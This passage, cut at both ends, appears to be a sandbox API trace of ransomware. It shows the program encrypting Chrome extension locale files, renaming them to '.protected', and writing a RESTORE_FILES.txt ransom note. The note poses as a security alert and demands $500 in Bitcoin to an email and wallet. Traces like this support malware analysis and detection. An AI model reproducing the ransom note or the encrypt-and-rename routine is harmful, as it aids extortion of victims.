nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x14b, lpOverlapped=0x0) returned 1 [0080.363] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeb5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.363] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x14b, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x14b, lpOverlapped=0x0) returned 1 [0080.364] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.364] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.364] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.364] CloseHandle (hObject=0x168) returned 1 [0080.364] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json.protected") returned 165 [0080.364] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json.protected")) returned 1 [0080.365] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.365] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.365] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\RESTORE_FILES.txt") returned 159 [0080.365] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.366] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.366] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.367] lstrlenA (lpString="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") returned 684 [0080.367] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.367] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.367] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.367] CloseHandle (hObject=0x164) returned 1 [0080.367] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.367] lstrcmpiW (lpString1="ca", lpString2="Windows") returned -1 [0080.367] lstrcmpiW (lpString1="ca", lpString2="Program Files") returned -1 [0080.367] lstrcmpiW (lpString1="ca", lpString2="Program Files (x86)") returned -1 [0080.367] lstrcmpiW (lpString1="ca", lpString2="$Recycle.bin") returned 1 [0080.367] lstrcmpiW (lpString1="ca", lpString2="System Volume Information") returned -1 [0080.367] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca") returned 141 [0080.367] lstrcmpW (lpString1="ca", lpString2=".") returned 1 [0080.367] lstrcmpW (lpString1="ca", lpString2="..") returned 1 [0080.367] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\*") returned 143 [0080.367] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.368] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.368] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.368] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.368] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.368] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.368] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\.") returned 143 [0080.368] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.369] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.369] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.369] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.369] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.369] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.369] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.369] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\..") returned 144 [0080.369] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.369] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.369] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.369] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.369] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.369] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.369] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.369] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.369] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json") 
returned 155 [0080.369] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.369] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.369] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.369] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.369] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.370] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json") returned 155 [0080.370] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.370] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json") returned 155 [0080.370] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.370] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json") returned 155 [0080.370] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.370] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xcf, lpOverlapped=0x0) returned 1 [0080.371] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.371] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xcf, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xcf, lpOverlapped=0x0) returned 1 [0080.371] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.371] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.371] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.372] CloseHandle (hObject=0x168) returned 1 [0080.372] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json.protected") returned 165 [0080.372] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json.protected")) returned 1 [0080.373] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.373] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.373] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\RESTORE_FILES.txt") returned 159 [0080.373] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.373] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.373] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.374] lstrlenA (lpString="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") returned 684 [0080.374] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.374] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.374] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.375] CloseHandle (hObject=0x164) returned 1 [0080.375] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.375] lstrcmpiW (lpString1="cs", lpString2="Windows") returned -1 [0080.375] lstrcmpiW (lpString1="cs", lpString2="Program Files") returned -1 [0080.375] lstrcmpiW (lpString1="cs", lpString2="Program Files (x86)") returned -1 [0080.375] lstrcmpiW (lpString1="cs", lpString2="$Recycle.bin") returned 1 [0080.375] lstrcmpiW (lpString1="cs", lpString2="System Volume Information") returned -1 [0080.375] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs") returned 141 [0080.375] lstrcmpW (lpString1="cs", lpString2=".") returned 1 [0080.375] lstrcmpW (lpString1="cs", lpString2="..") returned 1 [0080.375] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\*") returned 143 [0080.375] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.375] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.375] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.375] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.375] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.375] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.375] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\.") returned 143 [0080.375] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.376] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.376] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.376] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.376] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.376] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.376] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.376] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\..") returned 144 [0080.376] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.376] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.376] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.376] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.376] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.376] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.376] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.376] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.376] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json") 
returned 155 [0080.376] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.376] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.376] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.376] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.376] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.377] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json") returned 155 [0080.377] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.377] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json") returned 155 [0080.377] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.377] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json") returned 155 [0080.377] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.377] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xad, lpOverlapped=0x0) returned 1 [0080.378] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff53, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.378] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xad, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xad, lpOverlapped=0x0) returned 1 [0080.378] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.378] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.378] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.379] CloseHandle (hObject=0x168) returned 1 [0080.379] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json.protected") returned 165 [0080.379] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
